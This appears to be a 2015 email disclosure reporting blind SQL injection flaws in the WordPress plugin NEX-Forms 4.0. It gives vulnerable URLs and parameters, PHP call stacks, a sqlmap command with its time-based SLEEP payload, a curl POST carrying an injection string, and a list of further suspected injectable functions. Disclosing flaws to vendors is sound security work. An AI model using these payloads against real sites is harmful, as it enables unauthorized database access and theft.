Subject: Blind SQL injections in NEX-Forms 4.0
Date: Thu, 16 Jul 2015 11:21:19 +0200

Hello,

Plugin: NEX-Forms 4.0 https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

Unauthenticated attackers and authenticatged users can inject arbitrary SQL commands. Please also note that it seems there is no administrator privileges checking so anyone can mess with forms.


1. SQL injection (generate_csv())

This one is for unauthenticated users.

Method: GET/POST
Url: http://localhost/wp-admin/admin.php?page=nex-forms-main&export_nex_form=1&nex_forms_Id=1
Vulnerable parameter: nex_forms_Id

Example PHP callstack:
  CSVExport::__construct   [/nex-forms-express-wp-form-builder/main.php:374]
  CSVExport::generate_csv   [/nex-forms-express-wp-form-builder/main.php:446]
  wpdb::get_results

Verification:

sqlmap --dbms mysql -u "http://localhost/wp-admin/admin.php?page=nex-forms-main&export_nex_form=1&nex_forms_Id=1" -p nex_forms_Id

...
Parameter: nex_forms_Id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=nex-forms-main&export_nex_form=1&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Pzof)
...



2. SQL injection (IZC_Database::populate_dropdown_list())

This one is for authenticated users.

Method:  POST
Url: http://localhost/wp-admin/admin-ajax.php?action=populate_dropdown&Id=1
Vulnerable parameters: table,Id

Example PHP callstack:
  Module_Admin::__construct   [/nex-forms-express-wp-form-builder/includes/Core/class.admin.php:21]
  Module_Admin::add_new   [/nex-forms-express-wp-form-builder/includes/Core/class.admin.php:50]
  IZC_Template::build_dropdown   [/nex-forms-express-wp-form-builder/includes/Core/class.template.php:428]
  IZC_Database::populate_dropdown_list   [/nex-forms-express-wp-form-builder/includes/Core/class.db.php:397]
  wpdb::get_results

Verification:

curl --cookie "..." --data "table=posts where 1=(select * from (select sleep(5))X);-- -&plugin_alias=x" --request POST "http://lo
calhost/wp-admin/admin-ajax.php?action=populate_dropdown&Id=1"



3. Other possible SQL injections.

Sorry I haven't time to make sqlmap/curl verification, however it seems they are exploitable. 

* IZC_Template::get_total_records() (ex. invoked by IZC_Template::build_admin_table_pagination) params: table, nex_forms_id, additional_params

* IZC_Database::do_insert() params: table

* submit_nex_form() params: nex_forms_id

* IZC_Database::list_items() params: table

* NEXForms_admin::build_form_data_table() params: form_Id

* NEXForms_form_entries::get_total_form_entries (ex. invoked by NEXForms_form_entries::build_form_data_table()) params: wa_form_Id

* Plugin_Admin::add_new() params: Id

* IZC_Database::load_nex_form_attr(), params: form_Id

* IZC_Database::load_nex_form_hidden_fields, params: form_Id

* IZC_Database::delete_record , params: Id

-- 
Regards,
Marcin Probola,